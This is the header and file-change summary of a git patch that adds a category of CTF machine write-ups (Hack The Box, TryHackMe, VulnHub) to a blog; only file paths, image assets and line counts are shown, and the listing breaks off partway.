From 095a13b2c9b87d367cf0228bd63c540afba0cdbf Mon Sep 17 00:00:00 2001 
From: d3vyce Date: Sat, 2 Mar 2024 21:49:07 +0100 Subject: [PATCH] add: writeup-ctf --- .gitignore | 1 + config/_default/menus.en.toml | 6 + content/categories/_index.md | 10 + content/categories/writeup-ctf.md | 11 + .../writeup-ctf/_index.md | 0 .../writeup-access-htb/featured.png | 3 + .../writeup-access-htb/featured.webp | 3 + .../writeup-access-htb/img/image-1.png | 3 + .../writeup-access-htb/img/image-1.webp | 3 + .../writeup-access-htb/img/image-10.png | 3 + .../writeup-access-htb/img/image-10.webp | 3 + .../writeup-access-htb/img/image-11.png | 3 + .../writeup-access-htb/img/image-11.webp | 3 + .../writeup-access-htb/img/image-2.png | 3 + .../writeup-access-htb/img/image-2.webp | 3 + .../writeup-access-htb/img/image-3.png | 3 + .../writeup-access-htb/img/image-3.webp | 3 + .../writeup-access-htb/img/image-4.png | 3 + .../writeup-access-htb/img/image-4.webp | 3 + .../writeup-access-htb/img/image-5.png | 3 + .../writeup-access-htb/img/image-5.webp | 3 + .../writeup-access-htb/img/image-6.png | 3 + .../writeup-access-htb/img/image-6.webp | 3 + .../writeup-access-htb/img/image-7.png | 3 + .../writeup-access-htb/img/image-7.webp | 3 + .../writeup-access-htb/img/image-8.png | 3 + .../writeup-access-htb/img/image-8.webp | 3 + .../writeup-access-htb/img/image-9.png | 3 + .../writeup-access-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-access-htb/index.md | 106 ++++++ .../writeup-active-htb/featured.png | 3 + .../writeup-active-htb/featured.webp | 3 + .../writeup-active-htb/img/image-1.png | 3 + .../writeup-active-htb/img/image-1.webp | 3 + .../writeup-active-htb/img/image-10.png | 3 + .../writeup-active-htb/img/image-10.webp | 3 + .../writeup-active-htb/img/image-11.png | 3 + .../writeup-active-htb/img/image-11.webp | 3 + .../writeup-active-htb/img/image-2.png | 3 + .../writeup-active-htb/img/image-2.webp | 3 + .../writeup-active-htb/img/image-3.png | 3 + .../writeup-active-htb/img/image-3.webp | 3 + .../writeup-active-htb/img/image-4.png | 3 + 
.../writeup-active-htb/img/image-4.webp | 3 + .../writeup-active-htb/img/image-5.png | 3 + .../writeup-active-htb/img/image-5.webp | 3 + .../writeup-active-htb/img/image-6.png | 3 + .../writeup-active-htb/img/image-6.webp | 3 + .../writeup-active-htb/img/image-7.png | 3 + .../writeup-active-htb/img/image-7.webp | 3 + .../writeup-active-htb/img/image-8.png | 3 + .../writeup-active-htb/img/image-8.webp | 3 + .../writeup-active-htb/img/image-9.png | 3 + .../writeup-active-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-active-htb/index.md | 125 +++++++ .../writeup-backdoor-htb/featured.png | 3 + .../writeup-backdoor-htb/featured.webp | 3 + .../writeup-backdoor-htb/img/image-1.png | 3 + .../writeup-backdoor-htb/img/image-1.webp | 3 + .../writeup-backdoor-htb/img/image-10.png | 3 + .../writeup-backdoor-htb/img/image-10.webp | 3 + .../writeup-backdoor-htb/img/image-2.png | 3 + .../writeup-backdoor-htb/img/image-2.webp | 3 + .../writeup-backdoor-htb/img/image-3.png | 3 + .../writeup-backdoor-htb/img/image-3.webp | 3 + .../writeup-backdoor-htb/img/image-4.png | 3 + .../writeup-backdoor-htb/img/image-4.webp | 3 + .../writeup-backdoor-htb/img/image-5.png | 3 + .../writeup-backdoor-htb/img/image-5.webp | 3 + .../writeup-backdoor-htb/img/image-6.png | 3 + .../writeup-backdoor-htb/img/image-6.webp | 3 + .../writeup-backdoor-htb/img/image-7.png | 3 + .../writeup-backdoor-htb/img/image-7.webp | 3 + .../writeup-backdoor-htb/img/image-8.png | 3 + .../writeup-backdoor-htb/img/image-8.webp | 3 + .../writeup-backdoor-htb/img/image-9.png | 3 + .../writeup-backdoor-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-backdoor-htb/index.md | 128 +++++++ .../writeup-bashed-htb/featured.png | 3 + .../writeup-bashed-htb/featured.webp | 3 + .../writeup-bashed-htb/img/image-1.png | 3 + .../writeup-bashed-htb/img/image-1.webp | 3 + .../writeup-bashed-htb/img/image-10.png | 3 + .../writeup-bashed-htb/img/image-10.webp | 3 + .../writeup-bashed-htb/img/image-2.png | 3 + 
.../writeup-bashed-htb/img/image-2.webp | 3 + .../writeup-bashed-htb/img/image-3.png | 3 + .../writeup-bashed-htb/img/image-3.webp | 3 + .../writeup-bashed-htb/img/image-4.png | 3 + .../writeup-bashed-htb/img/image-4.webp | 3 + .../writeup-bashed-htb/img/image-5.png | 3 + .../writeup-bashed-htb/img/image-5.webp | 3 + .../writeup-bashed-htb/img/image-6.png | 3 + .../writeup-bashed-htb/img/image-6.webp | 3 + .../writeup-bashed-htb/img/image-7.png | 3 + .../writeup-bashed-htb/img/image-7.webp | 3 + .../writeup-bashed-htb/img/image-8.png | 3 + .../writeup-bashed-htb/img/image-8.webp | 3 + .../writeup-bashed-htb/img/image-9.png | 3 + .../writeup-bashed-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-bashed-htb/index.md | 88 +++++ .../writeup-biteme-thm/featured.png | 3 + .../writeup-biteme-thm/featured.webp | 3 + .../writeup-biteme-thm/img/image-1.png | 3 + .../writeup-biteme-thm/img/image-1.webp | 3 + .../writeup-biteme-thm/img/image-10.png | 3 + .../writeup-biteme-thm/img/image-10.webp | 3 + .../writeup-biteme-thm/img/image-11.png | 3 + .../writeup-biteme-thm/img/image-11.webp | 3 + .../writeup-biteme-thm/img/image-2.png | 3 + .../writeup-biteme-thm/img/image-2.webp | 3 + .../writeup-biteme-thm/img/image-3.png | 3 + .../writeup-biteme-thm/img/image-3.webp | 3 + .../writeup-biteme-thm/img/image-4.png | 3 + .../writeup-biteme-thm/img/image-4.webp | 3 + .../writeup-biteme-thm/img/image-5.png | 3 + .../writeup-biteme-thm/img/image-5.webp | 3 + .../writeup-biteme-thm/img/image-6.png | 3 + .../writeup-biteme-thm/img/image-6.webp | 3 + .../writeup-biteme-thm/img/image-7.png | 3 + .../writeup-biteme-thm/img/image-7.webp | 3 + .../writeup-biteme-thm/img/image-8.png | 3 + .../writeup-biteme-thm/img/image-8.webp | 3 + .../writeup-biteme-thm/img/image-9.png | 3 + .../writeup-biteme-thm/img/image-9.webp | 3 + .../writeup-ctf/writeup-biteme-thm/index.md | 149 ++++++++ .../writeup-catch-htb/featured.png | 3 + .../writeup-catch-htb/featured.webp | 3 + 
.../writeup-catch-htb/img/image-1.png | 3 + .../writeup-catch-htb/img/image-1.webp | 3 + .../writeup-catch-htb/img/image-2.png | 3 + .../writeup-catch-htb/img/image-2.webp | 3 + .../writeup-catch-htb/img/image-3.png | 3 + .../writeup-catch-htb/img/image-3.webp | 3 + .../writeup-catch-htb/img/image-4.png | 3 + .../writeup-catch-htb/img/image-4.webp | 3 + .../writeup-catch-htb/img/image-5.png | 3 + .../writeup-catch-htb/img/image-5.webp | 3 + .../writeup-catch-htb/img/image-6.png | 3 + .../writeup-catch-htb/img/image-6.webp | 3 + .../writeup-catch-htb/img/image-7.png | 3 + .../writeup-catch-htb/img/image-7.webp | 3 + .../writeup-catch-htb/img/image-8.png | 3 + .../writeup-catch-htb/img/image-8.webp | 3 + .../writeup-catch-htb/img/image-9.png | 3 + .../writeup-catch-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-catch-htb/index.md | 251 +++++++++++++ .../writeup-dc-9-vulnhub/featured.png | 3 + .../writeup-dc-9-vulnhub/featured.webp | 3 + .../writeup-dc-9-vulnhub/img/image-1.png | 3 + .../writeup-dc-9-vulnhub/img/image-1.webp | 3 + .../writeup-dc-9-vulnhub/img/image-10.png | 3 + .../writeup-dc-9-vulnhub/img/image-10.webp | 3 + .../writeup-dc-9-vulnhub/img/image-11.png | 3 + .../writeup-dc-9-vulnhub/img/image-11.webp | 3 + .../writeup-dc-9-vulnhub/img/image-12.png | 3 + .../writeup-dc-9-vulnhub/img/image-12.webp | 3 + .../writeup-dc-9-vulnhub/img/image-13.png | 3 + .../writeup-dc-9-vulnhub/img/image-13.webp | 3 + .../writeup-dc-9-vulnhub/img/image-2.png | 3 + .../writeup-dc-9-vulnhub/img/image-2.webp | 3 + .../writeup-dc-9-vulnhub/img/image-3.png | 3 + .../writeup-dc-9-vulnhub/img/image-3.webp | 3 + .../writeup-dc-9-vulnhub/img/image-4.png | 3 + .../writeup-dc-9-vulnhub/img/image-4.webp | 3 + .../writeup-dc-9-vulnhub/img/image-5.png | 3 + .../writeup-dc-9-vulnhub/img/image-5.webp | 3 + .../writeup-dc-9-vulnhub/img/image-6.png | 3 + .../writeup-dc-9-vulnhub/img/image-6.webp | 3 + .../writeup-dc-9-vulnhub/img/image-7.png | 3 + .../writeup-dc-9-vulnhub/img/image-7.webp 
| 3 + .../writeup-dc-9-vulnhub/img/image-8.png | 3 + .../writeup-dc-9-vulnhub/img/image-8.webp | 3 + .../writeup-dc-9-vulnhub/img/image-9.png | 3 + .../writeup-dc-9-vulnhub/img/image-9.webp | 3 + .../writeup-ctf/writeup-dc-9-vulnhub/index.md | 135 +++++++ .../writeup-delivery-htb/featured.png | 3 + .../writeup-delivery-htb/featured.webp | 3 + .../writeup-delivery-htb/img/image-1.png | 3 + .../writeup-delivery-htb/img/image-1.webp | 3 + .../writeup-delivery-htb/img/image-10.png | 3 + .../writeup-delivery-htb/img/image-10.webp | 3 + .../writeup-delivery-htb/img/image-11.png | 3 + .../writeup-delivery-htb/img/image-11.webp | 3 + .../writeup-delivery-htb/img/image-2.png | 3 + .../writeup-delivery-htb/img/image-2.webp | 3 + .../writeup-delivery-htb/img/image-3.png | 3 + .../writeup-delivery-htb/img/image-3.webp | 3 + .../writeup-delivery-htb/img/image-4.png | 3 + .../writeup-delivery-htb/img/image-4.webp | 3 + .../writeup-delivery-htb/img/image-5.png | 3 + .../writeup-delivery-htb/img/image-5.webp | 3 + .../writeup-delivery-htb/img/image-6.png | 3 + .../writeup-delivery-htb/img/image-6.webp | 3 + .../writeup-delivery-htb/img/image-7.png | 3 + .../writeup-delivery-htb/img/image-7.webp | 3 + .../writeup-delivery-htb/img/image-8.png | 3 + .../writeup-delivery-htb/img/image-8.webp | 3 + .../writeup-delivery-htb/img/image-9.png | 3 + .../writeup-delivery-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-delivery-htb/index.md | 169 +++++++++ .../writeup-devel-htb/featured.png | 3 + .../writeup-devel-htb/featured.webp | 3 + .../writeup-devel-htb/img/image-1.png | 3 + .../writeup-devel-htb/img/image-1.webp | 3 + .../writeup-devel-htb/img/image-2.png | 3 + .../writeup-devel-htb/img/image-2.webp | 3 + .../writeup-devel-htb/img/image-3.png | 3 + .../writeup-devel-htb/img/image-3.webp | 3 + .../writeup-devel-htb/img/image-4.png | 3 + .../writeup-devel-htb/img/image-4.webp | 3 + .../writeup-devel-htb/img/image-5.png | 3 + .../writeup-devel-htb/img/image-5.webp | 3 + 
.../writeup-devel-htb/img/image-6.png | 3 + .../writeup-devel-htb/img/image-6.webp | 3 + .../writeup-devel-htb/img/image-7.png | 3 + .../writeup-devel-htb/img/image-7.webp | 3 + .../writeup-devel-htb/img/image-8.png | 3 + .../writeup-devel-htb/img/image-8.webp | 3 + .../writeup-ctf/writeup-devel-htb/index.md | 101 ++++++ .../writeup-devzat-htb/featured.png | 3 + .../writeup-devzat-htb/featured.webp | 3 + .../writeup-devzat-htb/img/image-1.png | 3 + .../writeup-devzat-htb/img/image-1.webp | 3 + .../writeup-devzat-htb/img/image-10.png | 3 + .../writeup-devzat-htb/img/image-10.webp | 3 + .../writeup-devzat-htb/img/image-11.png | 3 + .../writeup-devzat-htb/img/image-11.webp | 3 + .../writeup-devzat-htb/img/image-12.png | 3 + .../writeup-devzat-htb/img/image-12.webp | 3 + .../writeup-devzat-htb/img/image-13.png | 3 + .../writeup-devzat-htb/img/image-13.webp | 3 + .../writeup-devzat-htb/img/image-14.png | 3 + .../writeup-devzat-htb/img/image-14.webp | 3 + .../writeup-devzat-htb/img/image-15.png | 3 + .../writeup-devzat-htb/img/image-15.webp | 3 + .../writeup-devzat-htb/img/image-16.png | 3 + .../writeup-devzat-htb/img/image-16.webp | 3 + .../writeup-devzat-htb/img/image-17.png | 3 + .../writeup-devzat-htb/img/image-17.webp | 3 + .../writeup-devzat-htb/img/image-18.png | 3 + .../writeup-devzat-htb/img/image-18.webp | 3 + .../writeup-devzat-htb/img/image-19.png | 3 + .../writeup-devzat-htb/img/image-19.webp | 3 + .../writeup-devzat-htb/img/image-2.png | 3 + .../writeup-devzat-htb/img/image-2.webp | 3 + .../writeup-devzat-htb/img/image-20.png | 3 + .../writeup-devzat-htb/img/image-20.webp | 3 + .../writeup-devzat-htb/img/image-21.png | 3 + .../writeup-devzat-htb/img/image-21.webp | 3 + .../writeup-devzat-htb/img/image-22.png | 3 + .../writeup-devzat-htb/img/image-22.webp | 3 + .../writeup-devzat-htb/img/image-23.png | 3 + .../writeup-devzat-htb/img/image-23.webp | 3 + .../writeup-devzat-htb/img/image-24.png | 3 + .../writeup-devzat-htb/img/image-24.webp | 3 + 
.../writeup-devzat-htb/img/image-25.png | 3 + .../writeup-devzat-htb/img/image-25.webp | 3 + .../writeup-devzat-htb/img/image-3.png | 3 + .../writeup-devzat-htb/img/image-3.webp | 3 + .../writeup-devzat-htb/img/image-4.png | 3 + .../writeup-devzat-htb/img/image-4.webp | 3 + .../writeup-devzat-htb/img/image-5.png | 3 + .../writeup-devzat-htb/img/image-5.webp | 3 + .../writeup-devzat-htb/img/image-6.png | 3 + .../writeup-devzat-htb/img/image-6.webp | 3 + .../writeup-devzat-htb/img/image-7.png | 3 + .../writeup-devzat-htb/img/image-7.webp | 3 + .../writeup-devzat-htb/img/image-8.png | 3 + .../writeup-devzat-htb/img/image-8.webp | 3 + .../writeup-devzat-htb/img/image-9.png | 3 + .../writeup-devzat-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-devzat-htb/index.md | 207 +++++++++++ .../writeup-dogcat-thm/img/image-1.png | 3 + .../writeup-dogcat-thm/img/image-1.webp | 3 + .../writeup-dogcat-thm/img/image-2.png | 3 + .../writeup-dogcat-thm/img/image-2.webp | 3 + .../writeup-dogcat-thm/img/image-3.png | 3 + .../writeup-dogcat-thm/img/image-3.webp | 3 + .../writeup-dogcat-thm/img/image-4.png | 3 + .../writeup-dogcat-thm/img/image-4.webp | 3 + .../writeup-dogcat-thm/img/image-5.png | 3 + .../writeup-dogcat-thm/img/image-5.webp | 3 + .../writeup-dogcat-thm/img/image-6.png | 3 + .../writeup-dogcat-thm/img/image-6.webp | 3 + .../writeup-dogcat-thm/img/image-7.png | 3 + .../writeup-dogcat-thm/img/image-7.webp | 3 + .../writeup-dogcat-thm/img/image-8.png | 3 + .../writeup-dogcat-thm/img/image-8.webp | 3 + .../writeup-ctf/writeup-dogcat-thm/index.md | 194 ++++++++++ .../writeup-goodgames-htb/featured.png | 3 + .../writeup-goodgames-htb/featured.webp | 3 + .../writeup-goodgames-htb/img/image-1.png | 3 + .../writeup-goodgames-htb/img/image-1.webp | 3 + .../writeup-goodgames-htb/img/image-10.png | 3 + .../writeup-goodgames-htb/img/image-10.webp | 3 + .../writeup-goodgames-htb/img/image-2.png | 3 + .../writeup-goodgames-htb/img/image-2.webp | 3 + 
.../writeup-goodgames-htb/img/image-3.png | 3 + .../writeup-goodgames-htb/img/image-3.webp | 3 + .../writeup-goodgames-htb/img/image-4.png | 3 + .../writeup-goodgames-htb/img/image-4.webp | 3 + .../writeup-goodgames-htb/img/image-5.png | 3 + .../writeup-goodgames-htb/img/image-5.webp | 3 + .../writeup-goodgames-htb/img/image-6.png | 3 + .../writeup-goodgames-htb/img/image-6.webp | 3 + .../writeup-goodgames-htb/img/image-7.png | 3 + .../writeup-goodgames-htb/img/image-7.webp | 3 + .../writeup-goodgames-htb/img/image-8.png | 3 + .../writeup-goodgames-htb/img/image-8.webp | 3 + .../writeup-goodgames-htb/img/image-9.png | 3 + .../writeup-goodgames-htb/img/image-9.webp | 3 + .../writeup-goodgames-htb/index.md | 208 +++++++++++ .../writeup-harder-thm/featured.png | 3 + .../writeup-harder-thm/featured.webp | 3 + .../writeup-harder-thm/img/image-1.png | 3 + .../writeup-harder-thm/img/image-1.webp | 3 + .../writeup-harder-thm/img/image-10.png | 3 + .../writeup-harder-thm/img/image-10.webp | 3 + .../writeup-harder-thm/img/image-11.png | 3 + .../writeup-harder-thm/img/image-11.webp | 3 + .../writeup-harder-thm/img/image-12.png | 3 + .../writeup-harder-thm/img/image-12.webp | 3 + .../writeup-harder-thm/img/image-13.png | 3 + .../writeup-harder-thm/img/image-13.webp | 3 + .../writeup-harder-thm/img/image-14.png | 3 + .../writeup-harder-thm/img/image-14.webp | 3 + .../writeup-harder-thm/img/image-15.png | 3 + .../writeup-harder-thm/img/image-15.webp | 3 + .../writeup-harder-thm/img/image-2.png | 3 + .../writeup-harder-thm/img/image-2.webp | 3 + .../writeup-harder-thm/img/image-3.png | 3 + .../writeup-harder-thm/img/image-3.webp | 3 + .../writeup-harder-thm/img/image-4.png | 3 + .../writeup-harder-thm/img/image-4.webp | 3 + .../writeup-harder-thm/img/image-5.png | 3 + .../writeup-harder-thm/img/image-5.webp | 3 + .../writeup-harder-thm/img/image-6.png | 3 + .../writeup-harder-thm/img/image-6.webp | 3 + .../writeup-harder-thm/img/image-7.png | 3 + 
.../writeup-harder-thm/img/image-7.webp | 3 + .../writeup-harder-thm/img/image-8.png | 3 + .../writeup-harder-thm/img/image-8.webp | 3 + .../writeup-harder-thm/img/image-9.png | 3 + .../writeup-harder-thm/img/image-9.webp | 3 + .../writeup-ctf/writeup-harder-thm/index.md | 217 +++++++++++ .../writeup-irked-htb/featured.png | 3 + .../writeup-irked-htb/featured.webp | 3 + .../writeup-irked-htb/img/image-1.png | 3 + .../writeup-irked-htb/img/image-1.webp | 3 + .../writeup-irked-htb/img/image-10.png | 3 + .../writeup-irked-htb/img/image-10.webp | 3 + .../writeup-irked-htb/img/image-11.png | 3 + .../writeup-irked-htb/img/image-11.webp | 3 + .../writeup-irked-htb/img/image-2.png | 3 + .../writeup-irked-htb/img/image-2.webp | 3 + .../writeup-irked-htb/img/image-3.png | 3 + .../writeup-irked-htb/img/image-3.webp | 3 + .../writeup-irked-htb/img/image-4.png | 3 + .../writeup-irked-htb/img/image-4.webp | 3 + .../writeup-irked-htb/img/image-5.png | 3 + .../writeup-irked-htb/img/image-5.webp | 3 + .../writeup-irked-htb/img/image-6.png | 3 + .../writeup-irked-htb/img/image-6.webp | 3 + .../writeup-irked-htb/img/image-7.png | 3 + .../writeup-irked-htb/img/image-7.webp | 3 + .../writeup-irked-htb/img/image-8.png | 3 + .../writeup-irked-htb/img/image-8.webp | 3 + .../writeup-irked-htb/img/image-9.png | 3 + .../writeup-irked-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-irked-htb/index.md | 97 +++++ .../writeup-ctf/writeup-late-htb/featured.png | 3 + .../writeup-late-htb/featured.webp | 3 + .../writeup-late-htb/img/image-1.png | 3 + .../writeup-late-htb/img/image-1.webp | 3 + .../writeup-late-htb/img/image-10.png | 3 + .../writeup-late-htb/img/image-10.webp | 3 + .../writeup-late-htb/img/image-11.png | 3 + .../writeup-late-htb/img/image-11.webp | 3 + .../writeup-late-htb/img/image-12.png | 3 + .../writeup-late-htb/img/image-12.webp | 3 + .../writeup-late-htb/img/image-13.png | 3 + .../writeup-late-htb/img/image-13.webp | 3 + .../writeup-late-htb/img/image-2.png | 3 + 
.../writeup-late-htb/img/image-2.webp | 3 + .../writeup-late-htb/img/image-3.png | 3 + .../writeup-late-htb/img/image-3.webp | 3 + .../writeup-late-htb/img/image-4.png | 3 + .../writeup-late-htb/img/image-4.webp | 3 + .../writeup-late-htb/img/image-5.png | 3 + .../writeup-late-htb/img/image-5.webp | 3 + .../writeup-late-htb/img/image-6.png | 3 + .../writeup-late-htb/img/image-6.webp | 3 + .../writeup-late-htb/img/image-7.png | 3 + .../writeup-late-htb/img/image-7.webp | 3 + .../writeup-late-htb/img/image-8.png | 3 + .../writeup-late-htb/img/image-8.webp | 3 + .../writeup-late-htb/img/image-9.png | 3 + .../writeup-late-htb/img/image-9.webp | 3 + content/writeup-ctf/writeup-late-htb/index.md | 146 ++++++++ .../writeup-ctf/writeup-meta-htb/featured.png | 3 + .../writeup-meta-htb/featured.webp | 3 + .../writeup-meta-htb/img/image-1.png | 3 + .../writeup-meta-htb/img/image-1.webp | 3 + .../writeup-meta-htb/img/image-10.png | 3 + .../writeup-meta-htb/img/image-10.webp | 3 + .../writeup-meta-htb/img/image-11.png | 3 + .../writeup-meta-htb/img/image-11.webp | 3 + .../writeup-meta-htb/img/image-12.png | 3 + .../writeup-meta-htb/img/image-12.webp | 3 + .../writeup-meta-htb/img/image-13.png | 3 + .../writeup-meta-htb/img/image-13.webp | 3 + .../writeup-meta-htb/img/image-2.png | 3 + .../writeup-meta-htb/img/image-2.webp | 3 + .../writeup-meta-htb/img/image-3.png | 3 + .../writeup-meta-htb/img/image-3.webp | 3 + .../writeup-meta-htb/img/image-4.png | 3 + .../writeup-meta-htb/img/image-4.webp | 3 + .../writeup-meta-htb/img/image-5.png | 3 + .../writeup-meta-htb/img/image-5.webp | 3 + .../writeup-meta-htb/img/image-6.png | 3 + .../writeup-meta-htb/img/image-6.webp | 3 + .../writeup-meta-htb/img/image-7.png | 3 + .../writeup-meta-htb/img/image-7.webp | 3 + .../writeup-meta-htb/img/image-8.png | 3 + .../writeup-meta-htb/img/image-8.webp | 3 + .../writeup-meta-htb/img/image-9.png | 3 + .../writeup-meta-htb/img/image-9.webp | 3 + content/writeup-ctf/writeup-meta-htb/index.md | 153 
++++++++ .../writeup-networked-htb/featured.png | 3 + .../writeup-networked-htb/featured.webp | 3 + .../writeup-networked-htb/img/image-1.png | 3 + .../writeup-networked-htb/img/image-1.webp | 3 + .../writeup-networked-htb/img/image-10.png | 3 + .../writeup-networked-htb/img/image-10.webp | 3 + .../writeup-networked-htb/img/image-11.png | 3 + .../writeup-networked-htb/img/image-11.webp | 3 + .../writeup-networked-htb/img/image-12.png | 3 + .../writeup-networked-htb/img/image-12.webp | 3 + .../writeup-networked-htb/img/image-13.png | 3 + .../writeup-networked-htb/img/image-13.webp | 3 + .../writeup-networked-htb/img/image-14.png | 3 + .../writeup-networked-htb/img/image-14.webp | 3 + .../writeup-networked-htb/img/image-2.png | 3 + .../writeup-networked-htb/img/image-2.webp | 3 + .../writeup-networked-htb/img/image-3.png | 3 + .../writeup-networked-htb/img/image-3.webp | 3 + .../writeup-networked-htb/img/image-4.png | 3 + .../writeup-networked-htb/img/image-4.webp | 3 + .../writeup-networked-htb/img/image-5.png | 3 + .../writeup-networked-htb/img/image-5.webp | 3 + .../writeup-networked-htb/img/image-6.png | 3 + .../writeup-networked-htb/img/image-6.webp | 3 + .../writeup-networked-htb/img/image-7.png | 3 + .../writeup-networked-htb/img/image-7.webp | 3 + .../writeup-networked-htb/img/image-8.png | 3 + .../writeup-networked-htb/img/image-8.webp | 3 + .../writeup-networked-htb/img/image-9.png | 3 + .../writeup-networked-htb/img/image-9.webp | 3 + .../writeup-networked-htb/index.md | 194 ++++++++++ .../writeup-nibbles-htb/featured.png | 3 + .../writeup-nibbles-htb/featured.webp | 3 + .../writeup-nibbles-htb/img/image-1.png | 3 + .../writeup-nibbles-htb/img/image-1.webp | 3 + .../writeup-nibbles-htb/img/image-10.png | 3 + .../writeup-nibbles-htb/img/image-10.webp | 3 + .../writeup-nibbles-htb/img/image-2.png | 3 + .../writeup-nibbles-htb/img/image-2.webp | 3 + .../writeup-nibbles-htb/img/image-3.png | 3 + .../writeup-nibbles-htb/img/image-3.webp | 3 + 
.../writeup-nibbles-htb/img/image-4.png | 3 + .../writeup-nibbles-htb/img/image-4.webp | 3 + .../writeup-nibbles-htb/img/image-5.png | 3 + .../writeup-nibbles-htb/img/image-5.webp | 3 + .../writeup-nibbles-htb/img/image-6.png | 3 + .../writeup-nibbles-htb/img/image-6.webp | 3 + .../writeup-nibbles-htb/img/image-7.png | 3 + .../writeup-nibbles-htb/img/image-7.webp | 3 + .../writeup-nibbles-htb/img/image-8.png | 3 + .../writeup-nibbles-htb/img/image-8.webp | 3 + .../writeup-nibbles-htb/img/image-9.png | 3 + .../writeup-nibbles-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-nibbles-htb/index.md | 101 ++++++ .../writeup-oh-my-webserver-thm/featured.png | 3 + .../writeup-oh-my-webserver-thm/featured.webp | 3 + .../img/image-1.png | 3 + .../img/image-1.webp | 3 + .../img/image-2.png | 3 + .../img/image-2.webp | 3 + .../img/image-3.png | 3 + .../img/image-3.webp | 3 + .../img/image-4.png | 3 + .../img/image-4.webp | 3 + .../img/image-5.png | 3 + .../img/image-5.webp | 3 + .../img/image-6.png | 3 + .../img/image-6.webp | 3 + .../img/image-7.png | 3 + .../img/image-7.webp | 3 + .../img/image-8.png | 3 + .../img/image-8.webp | 3 + .../writeup-oh-my-webserver-thm/index.md | 120 ++++++ .../writeup-ollie-thm/featured.png | 3 + .../writeup-ollie-thm/featured.webp | 3 + .../writeup-ollie-thm/img/image-1.png | 3 + .../writeup-ollie-thm/img/image-1.webp | 3 + .../writeup-ollie-thm/img/image-2.png | 3 + .../writeup-ollie-thm/img/image-2.webp | 3 + .../writeup-ollie-thm/img/image-3.png | 3 + .../writeup-ollie-thm/img/image-3.webp | 3 + .../writeup-ollie-thm/img/image-4.png | 3 + .../writeup-ollie-thm/img/image-4.webp | 3 + .../writeup-ollie-thm/img/image-5.png | 3 + .../writeup-ollie-thm/img/image-5.webp | 3 + .../writeup-ollie-thm/img/image-6.png | 3 + .../writeup-ollie-thm/img/image-6.webp | 3 + .../writeup-ollie-thm/img/image-7.png | 3 + .../writeup-ollie-thm/img/image-7.webp | 3 + .../writeup-ollie-thm/img/image-8.png | 3 + .../writeup-ollie-thm/img/image-8.webp | 3 + 
.../writeup-ollie-thm/img/image-9.png | 3 + .../writeup-ollie-thm/img/image-9.webp | 3 + .../writeup-ctf/writeup-ollie-thm/index.md | 159 ++++++++ .../writeup-pandora-htb/featured.png | 3 + .../writeup-pandora-htb/featured.webp | 3 + .../writeup-pandora-htb/img/image-1.png | 3 + .../writeup-pandora-htb/img/image-1.webp | 3 + .../writeup-pandora-htb/img/image-10.png | 3 + .../writeup-pandora-htb/img/image-10.webp | 3 + .../writeup-pandora-htb/img/image-11.png | 3 + .../writeup-pandora-htb/img/image-11.webp | 3 + .../writeup-pandora-htb/img/image-2.png | 3 + .../writeup-pandora-htb/img/image-2.webp | 3 + .../writeup-pandora-htb/img/image-3.png | 3 + .../writeup-pandora-htb/img/image-3.webp | 3 + .../writeup-pandora-htb/img/image-4.png | 3 + .../writeup-pandora-htb/img/image-4.webp | 3 + .../writeup-pandora-htb/img/image-5.png | 3 + .../writeup-pandora-htb/img/image-5.webp | 3 + .../writeup-pandora-htb/img/image-6.png | 3 + .../writeup-pandora-htb/img/image-6.webp | 3 + .../writeup-pandora-htb/img/image-7.png | 3 + .../writeup-pandora-htb/img/image-7.webp | 3 + .../writeup-pandora-htb/img/image-8.png | 3 + .../writeup-pandora-htb/img/image-8.webp | 3 + .../writeup-pandora-htb/img/image-9.png | 3 + .../writeup-pandora-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-pandora-htb/index.md | 162 +++++++++ .../writeup-paper-htb/featured.png | 3 + .../writeup-paper-htb/featured.webp | 3 + .../writeup-paper-htb/img/image-1.png | 3 + .../writeup-paper-htb/img/image-1.webp | 3 + .../writeup-paper-htb/img/image-10.png | 3 + .../writeup-paper-htb/img/image-10.webp | 3 + .../writeup-paper-htb/img/image-11.png | 3 + .../writeup-paper-htb/img/image-11.webp | 3 + .../writeup-paper-htb/img/image-12.png | 3 + .../writeup-paper-htb/img/image-12.webp | 3 + .../writeup-paper-htb/img/image-13.png | 3 + .../writeup-paper-htb/img/image-13.webp | 3 + .../writeup-paper-htb/img/image-2.png | 3 + .../writeup-paper-htb/img/image-2.webp | 3 + .../writeup-paper-htb/img/image-3.png | 3 + 
.../writeup-paper-htb/img/image-3.webp | 3 + .../writeup-paper-htb/img/image-4.png | 3 + .../writeup-paper-htb/img/image-4.webp | 3 + .../writeup-paper-htb/img/image-5.png | 3 + .../writeup-paper-htb/img/image-5.webp | 3 + .../writeup-paper-htb/img/image-6.png | 3 + .../writeup-paper-htb/img/image-6.webp | 3 + .../writeup-paper-htb/img/image-7.png | 3 + .../writeup-paper-htb/img/image-7.webp | 3 + .../writeup-paper-htb/img/image-8.png | 3 + .../writeup-paper-htb/img/image-8.webp | 3 + .../writeup-paper-htb/img/image-9.png | 3 + .../writeup-paper-htb/img/image-9.webp | 3 + .../writeup-ctf/writeup-paper-htb/index.md | 140 +++++++ .../writeup-plotted-tms-thm/featured.png | 3 + .../writeup-plotted-tms-thm/featured.webp | 3 + .../writeup-plotted-tms-thm/img/image-1.png | 3 + .../writeup-plotted-tms-thm/img/image-1.webp | 3 + .../writeup-plotted-tms-thm/img/image-10.png | 3 + .../writeup-plotted-tms-thm/img/image-10.webp | 3 + .../writeup-plotted-tms-thm/img/image-11.png | 3 + .../writeup-plotted-tms-thm/img/image-11.webp | 3 + .../writeup-plotted-tms-thm/img/image-2.png | 3 + .../writeup-plotted-tms-thm/img/image-2.webp | 3 + .../writeup-plotted-tms-thm/img/image-3.png | 3 + .../writeup-plotted-tms-thm/img/image-3.webp | 3 + .../writeup-plotted-tms-thm/img/image-4.png | 3 + .../writeup-plotted-tms-thm/img/image-4.webp | 3 + .../writeup-plotted-tms-thm/img/image-5.png | 3 + .../writeup-plotted-tms-thm/img/image-5.webp | 3 + 